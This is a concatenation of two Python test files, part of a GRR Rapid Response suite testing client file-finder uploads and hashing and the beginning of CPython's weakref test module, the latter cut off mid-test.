# Make sure the file was uploaded correctly.
fd = fs.OpenForReading(r.file_id)
data = fd.read()
self.assertEqual(data, magic_string)
def _RunClientFileFinder(self,
paths,
action,
network_bytes_limit=None,
client_id=None):
client_id = client_id or self.SetupClients(1)[0]
with test_lib.ConfigOverrider({"Client.server_urls": [self.base_url]}):
client = comms.GRRHTTPClient(
ca_cert=config_lib.CONFIG["CA.certificate"],
private_key=config_lib.CONFIG.Get("Client.private_key", default=None))
client.client_worker = worker_mocks.FakeThreadedWorker(client=client)
client.server_certificate = config_lib.CONFIG["Frontend.certificate"]
for s in test_lib.TestFlowHelper(
"ClientFileFinder",
action_mocks.ClientFileFinderClientMock(
client_worker=client.client_worker),
client_id=client_id,
paths=paths,
pathtype=rdf_paths.PathSpec.PathType.OS,
action=action,
process_non_regular_files=True,
network_bytes_limit=network_bytes_limit,
token=self.token):
session_id = s
return session_id
def testClientFileFinderUpload(self):
paths = [os.path.join(self.base_path, "**/*.plist")]
action_type = rdf_file_finder.FileFinderAction.Action.DOWNLOAD
action = rdf_file_finder.FileFinderAction(action_type=action_type)
session_id = self._RunClientFileFinder(paths, action)
collection = flow.GRRFlow.ResultCollectionForFID(
session_id, token=self.token)
results = list(collection)
self.assertEqual(len(results), 4)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertItemsEqual(relpaths, [
"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
data = open(r.stat_entry.pathspec.path, "rb").read()
self.assertEqual(aff4_obj.Read(100), data[:100])
for hash_obj in [
r.uploaded_file.hash,
aff4_obj.Get(aff4_obj.Schema.HASH)
]:
self.assertEqual(hash_obj.md5, hashlib.md5(data).hexdigest())
self.assertEqual(hash_obj.sha1, hashlib.sha1(data).hexdigest())
self.assertEqual(hash_obj.sha256, hashlib.sha256(data).hexdigest())
def testClientFileFinderUploadLimit(self):
paths = [os.path.join(self.base_path, "**/*.plist")]
action_type = rdf_file_finder.FileFinderAction.Action.DOWNLOAD
action = rdf_file_finder.FileFinderAction(action_type=action_type)
with self.assertRaises(RuntimeError) as e:
self._RunClientFileFinder(paths, action, network_bytes_limit=2000)
self.assertIn("Action exceeded network send limit.", e.exception.message)
def testClientFileFinderUploadBound(self):
paths = [os.path.join(self.base_path, "**/*.plist")]
action_type = rdf_file_finder.FileFinderAction.Action.DOWNLOAD
download_action = rdf_file_finder.FileFinderDownloadActionOptions(
oversized_file_policy="DOWNLOAD_TRUNCATED", max_size=300)
action = rdf_file_finder.FileFinderAction(
action_type=action_type, download=download_action)
session_id = self._RunClientFileFinder(paths, action)
collection = flow.GRRFlow.ResultCollectionForFID(
session_id, token=self.token)
results = list(collection)
self.assertEqual(len(results), 4)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertItemsEqual(relpaths, [
"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
data = aff4_obj.Read(1000000)
self.assertLessEqual(len(data), 300)
self.assertEqual(data,
open(r.stat_entry.pathspec.path, "rb").read(len(data)))
def testClientFileFinderUploadSkip(self):
paths = [os.path.join(self.base_path, "**/*.plist")]
action_type = rdf_file_finder.FileFinderAction.Action.DOWNLOAD
download_action = rdf_file_finder.FileFinderDownloadActionOptions(
oversized_file_policy="SKIP", max_size=300)
action = rdf_file_finder.FileFinderAction(
action_type=action_type, download=download_action)
session_id = self._RunClientFileFinder(paths, action)
collection = flow.GRRFlow.ResultCollectionForFID(
session_id, token=self.token)
results = list(collection)
# Only two instead of the usual four results.
self.assertEqual(len(results), 2)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertItemsEqual(relpaths, ["History.plist", "test.plist"])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
self.assertEqual(
aff4_obj.Read(100), open(r.stat_entry.pathspec.path, "rb").read(100))
def testClientFileFinderFilestoreIntegration(self):
paths = [os.path.join(self.base_path, "**/*.plist")]
action_type = rdf_file_finder.FileFinderAction.Action.DOWNLOAD
action = rdf_file_finder.FileFinderAction(action_type=action_type)
client_ids = self.SetupClients(2)
session_ids = {
c: self._RunClientFileFinder(paths, action, client_id=c)
for c in client_ids
}
collections = {
c: flow.GRRFlow.ResultCollectionForFID(session_id, token=self.token)
for c, session_id in session_ids.iteritems()
}
for client_id, collection in collections.iteritems():
results = list(collection)
self.assertEqual(len(results), 4)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertItemsEqual(relpaths, [
"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(client_id), token=self.token)
# When files are uploaded to the server directly, we should get a
# FileStoreAFF4Object.
self.assertIsInstance(aff4_obj, file_store.FileStoreAFF4Object)
# There is a STAT entry.
self.assertTrue(aff4_obj.Get(aff4_obj.Schema.STAT))
# Make sure the HashFileStore has references to this file for
# all hashes.
hashes = aff4_obj.Get(aff4_obj.Schema.HASH)
fs = filestore.HashFileStore
md5_refs = list(fs.GetReferencesMD5(hashes.md5, token=self.token))
self.assertIn(aff4_obj.urn, md5_refs)
sha1_refs = list(fs.GetReferencesSHA1(hashes.sha1, token=self.token))
self.assertIn(aff4_obj.urn, sha1_refs)
sha256_refs = list(
fs.GetReferencesSHA256(hashes.sha256, token=self.token))
self.assertIn(aff4_obj.urn, sha256_refs)
# Open the file inside the file store.
urn, _ = fs(None, token=self.token).CheckHashes(hashes).next()
filestore_fd = aff4.FACTORY.Open(urn, token=self.token)
# This is a FileStoreAFF4Object too.
self.assertIsInstance(filestore_fd, file_store.FileStoreAFF4Object)
# No STAT object attached.
self.assertFalse(filestore_fd.Get(filestore_fd.Schema.STAT))
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
# XXX(T62694321): Keep the lists alive until the end of the function.
self.assertIs(L, L)
self.assertIs(L2, L2)
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_proxy_iter(self):
# Test fails with a debug build of the interpreter
# (see bpo-38395).
obj = None
class MyObj:
def __iter__(self):
nonlocal obj
del obj
return NotImplemented
obj = MyObj()
p = weakref.proxy(obj)
with self.assertRaises(TypeError):
# "blech" in p calls MyObj.__iter__ through the proxy,
# without keeping a reference to the real object, so it
# can be killed in the middle of the call
"blech" in p
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
@support.requires_type_collecting
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
# - retain their hash is they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
